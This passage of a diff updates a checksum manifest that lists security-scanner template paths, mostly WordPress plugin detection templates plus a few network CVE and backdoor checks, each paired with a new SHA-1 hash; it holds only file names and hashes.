-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85 -http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:8e1eabb506c0b746de758852d2b8980766a0b94c +http/technologies/wordpress/plugins/sg-security.yaml:9052be594f4d2bffac320adf7b1a019f797528a5 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245 -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7053,90 +7053,90 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794 -network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f -network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 -network/cves/2001/CVE-2001-1473.yaml:4145fb7f555bfac7ccca007a9fb5852758e106f2 -network/cves/2011/CVE-2011-2523.yaml:4ccb3e295a9d1767f6cbcb9a002612925bd6a515 -network/cves/2015/CVE-2015-3306.yaml:3c84863be8c2479425260df77377099bb9fd9478 -network/cves/2016/CVE-2016-2004.yaml:06a7c58f1150be1ce743ede2cf57f09379479ae2 -network/cves/2016/CVE-2016-3510.yaml:2850b8cede8767d64635c87818c2dbeaa0c12f12 -network/cves/2017/CVE-2017-3881.yaml:5a1798099302282f684b4e45404fee4eb239b5a8 -network/cves/2017/CVE-2017-5645.yaml:912a3a77c286cf1cfaa14bc57eb0be80419393c0 +network/backdoor/backdoored-zte.yaml:f2404c7da8bc8f4a0f44c9a98c954a0b70b6a6ca +network/backdoor/vsftpd-backdoor.yaml:be584f958ad40909f5fd12048c1c70840e5b55fd +network/cves/2001/CVE-2001-1473.yaml:3533c4dd73e57282133423457b202f16ce6b8dac +network/cves/2011/CVE-2011-2523.yaml:827f6785ecdf7e6e387253450f502995bc2cf5c3 +network/cves/2015/CVE-2015-3306.yaml:55a8f518a54a533a10b30e3bd93ba1039bdb1f0e 